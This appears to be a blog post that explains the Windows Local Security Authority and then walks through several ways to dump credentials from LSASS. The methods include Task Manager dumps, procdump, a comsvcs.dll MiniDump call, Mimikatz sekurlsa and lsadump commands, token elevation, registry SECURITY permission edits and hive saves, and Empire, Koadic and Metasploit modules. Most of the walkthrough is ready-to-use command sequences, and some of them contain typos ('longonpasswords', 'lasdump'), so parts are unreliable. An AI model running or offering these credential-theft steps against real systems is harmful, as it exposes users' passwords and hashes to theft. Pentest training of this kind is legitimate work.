LSA and LSASS stands for "Local Security
Authority" And "Local Security Authority Subsystem (server)
Service", respectively
The Local Security Authority (LSA) is a protected
system process that authenticates and logs users on to the local computer. Domain
credentials are used by the operating system and authenticated by the Local
Security Authority (LSA). The LSA can validate user information by checking the
Security Accounts Manager (SAM) database located on the same computer.
The LSA is a
user-mode process (LSASS.EXE) used to stores security information of a system
known as the Local Security Policy. The LSA maintains local security policy
information in a set of objects.
·
Policy
contains global policy information.
·
TrustedDomain
contains information about a trusted domain.
·
Account
contains information about a user, group, or local group account.
·
Private
Data contains protected information, such as server account passwords. This
information is stored as encrypted strings.
LSASS manages the local system policy, user
authentication, and auditing while handling sensitive security data such as
password hashes and Kerberos keys.The secret part of domain credentials, the
password, is protected by the operating system. Only code running in-process
with the LSA can read and write domain credentials.
LSASS can store credentials in multiple forms,
including:
·
Reversibly
encrypted plaintext
·
Kerberos
tickets (ticket-granting tickets (TGTs), service tickets)
·
NT
hash
·
LAN
Manager (LM) hash
LSA
(LSASS.EXE) Credential Dumping Walkthorugh
Required Tools or Scripts: Mimikatz.exe & Mimikatz.ps1, Procdump PowerShell
Empire, Koadic, Metasploit
Host Machine: In context of lsass.exe Windows 7 & for LSA
Windows 10
Table of Content
·
Windows
7 (lsass.exe) Credential Dump using Mimikatz
·
Windows
10 (LSA) Credential Dump using Mimikatz
·
PowerShell
Empire
·
Koadic
·
Metasploit
Windows 7 (lsass.exe)
Credential Dump using Mimikatz
In your local machine (target) and open the task
manager, navigate to processes for exploring running process of lsass.exe and
make a right click to explore its snippet.
Choose create Dump file option which will dump the stored credential.
You will get the
“lsass.DMP” file inside the /Temp directory of the user account directory under
/AppData/local
Now start
mimikatz to get the data out of the DMP file using the following command:
privilege::debug
sekurlsa::minidump
C:\Users\raj\AppData\Local\Temp\lsass.DMP
sekurlsa::longonpasswords
As you can see
from the image below, we have a clear text password.
Method 2:
ProcDump
The ProcDump
tool is a free command line tool published by Sysinternals whose primary
purpose is monitoring an application and generating memory dumps.
Use the “-accepteula”
command line option to automatically accept the Sysinternals license agreement
and “-ma” Parameter to write a dump file with all process memory (lsass.exe) in
a .dmp format.
procdump.exe
-accepteula -ma lsass.exe mem.dmp
Again, repeat
the same step and use mimikatz to read the mem.dmp file.
privilege::debug
sekurlsa::minidump
C:\Users\raj\Downloads\Procdump\mem.dmp
sekurlsa::longonpasswords
And now, as
you can see from the image below, we've got a clear text password.
Method 2: comsvcs.dll
The
comsvcs.dll DLL found in Windows\system32 that call minidump with rundll32, so
you can use it to dump the Lsass.exe process memory to retrieve credentials.
Let's identify the process ID for lsass before running the dll.
Get-Process
Lsass
.\rundll32.exe
C:\windows\System32\comsvcs.dll, MiniDump 492
Again, repeat
the same step and use mimikatz to read the mem.dmp file.
privilege::debug
sekurlsa::minidump
C:\mem.dmp
sekurlsa::longonpasswords
Again, we've
got a clear text password.
Windows 10 (LSA)
Credential Dump
Method
1: Task manager
The Lsass.exe is
renamed as LSA in Windows 10 and process can be found by the name of “Local
Security Authority” inside the task manager.
It will also save the dump file in .dmp format so, again repeat same
step as done above.
Go to the task
manager and explore the process for Local Security Authority, then extract its
dump as shown.
You will get the
“lsass.DMP” file inside the /Temp directory of the user account directory under
/AppData/local.
Again, repeat
the same step and use mimikatz to read the dmp file.
privilege::debug
sekurlsa::minidump
C:\Users\raj\AppData\Local\Temp\lsass.DMP
sekurlsa::longonpasswords
Since it was Windows
10 therefore the level of security get increases and we have obtained the
password hashes, as you can see from the given below image.
Method 2:
Mimikatz parameter -patch
Patch is patching
the samsrv.dll running inside lsass.exe which displays LM and NT hashes. So,
you when you will execute the following commands it will dump the password
hashes.
privilege::debug
lsadump::
lsa /patch
Method3: Mimikatz - Token Elevation
We are using
mimikatz once again to get the hashes directly, without involving any dump file
or dll execution this is known as Token impersonate. as you can observe that,
we got error when we try to run following command as local user.
Privilege::debug
Lsadump::secrets
This can be done
by impersonate a token that will be used to elevate permissions to SYSTEM (default)
or find a domain admin token and as result you will able to dump the password
in clear text.
privilege::debug
token::elevate
lasdump::secrets
Method 4: Editing
File Permission in the Registry
The LSA secrets
are held in the Registry. If services are run as local or domain user, their
passwords are stored in the Registry. If auto-logon is activated, it will also
store this information in the Registry.
This can be done
also done locally by changing permission values inside the registry. Navigate
to Computer\HKEY_LOCAL_MACHINE\SECURITY.
Expand the
SECURITY folder and choose permissions from inside the list.
Allow full
Control to the administrator user as shown.
As you can
observe that this time, we are able to fetch sub-folders under Security
directories.
So, once you
run the following command again, you can see the credential in the plain text
as shown.
privilege::debug
lasdump::secrets
Method 5: Save
privilege File of the Registry
Similarly,
you can use another approach that will also operate in the same direction. Save
system and security registry values with the help of the following command.
reg save
HKLM\SYSTEM system
reg save
HKLM\security security
As you can
see if you use lsa::secrets command without a specified argument, you will not
be able to retrieve the password, but if you enter the path for the file
described above, mimikatz will dump the password in plain text.
privilege::debug
lsadump::secrets/system:c:\system
/security:c:\security
PowerShell Empire
Empire is one of
the good pentesting framework that work like as Metasploit, you can download it
from GitHub and install
in your attacking machine in order to launch attack remotely.
This is a post
exploit, thus first you need to be compromised the host machine and then use
the following module for LSA secrets dumps
usemodule
credentials/mimikatz/lsadump
execute
As result it
dump password hashes saved as shown in the given image.
Koadic
Koadic, or COM
Command & Control, is a Windows post-exploitation rootkit similar to other
penetration testing tools such as Meterpreter and Powershell Empire. It allows
the attacker to run comsvcs.dll that will call the minidump and fetch the dump
of lsass.exe to retrieve stored NTLM hashes. Read more from here
use
comsvcs_lsass
As result it
dumped the password hashes saved as shown in the given image.
Metasploit
Method1:
Load kiwi
As we all know
Metasploit is like swiss knife, it comes with multiple module thus it allows
attacker to execute mimikatz remotely and extract the Lsass dump to fetch the
credentials. Since it is a post exploitation thus you should have meterpreter
session of the host machine at Initial Phase and then load kiwi in order to
initialise mimikatz and execute the command.
lsa_dump_secrets
Method2:
Load powershell
Similarly, you
can also load powershell in the replace of kiwi and perform the same operation,
here we are using powershell script of mimikatz. This can be done by executing
following commands:
load
powershell
powershell_import
/root/powershell/Invoke-Mimikatz.ps1
sekurlsa::longonpasswds
This will be dumping
the password hashes as shown in the below image.
Conclusion: In
this post, you learned about Windows LSA Protection and its working along with
its multiple techniques to exploit in context to get clear text password or
hashes. Most of the attacks replaced the original lsass.exe from malware
lsass.exe to make deceive the security monitors.
0 comments:
Post a Comment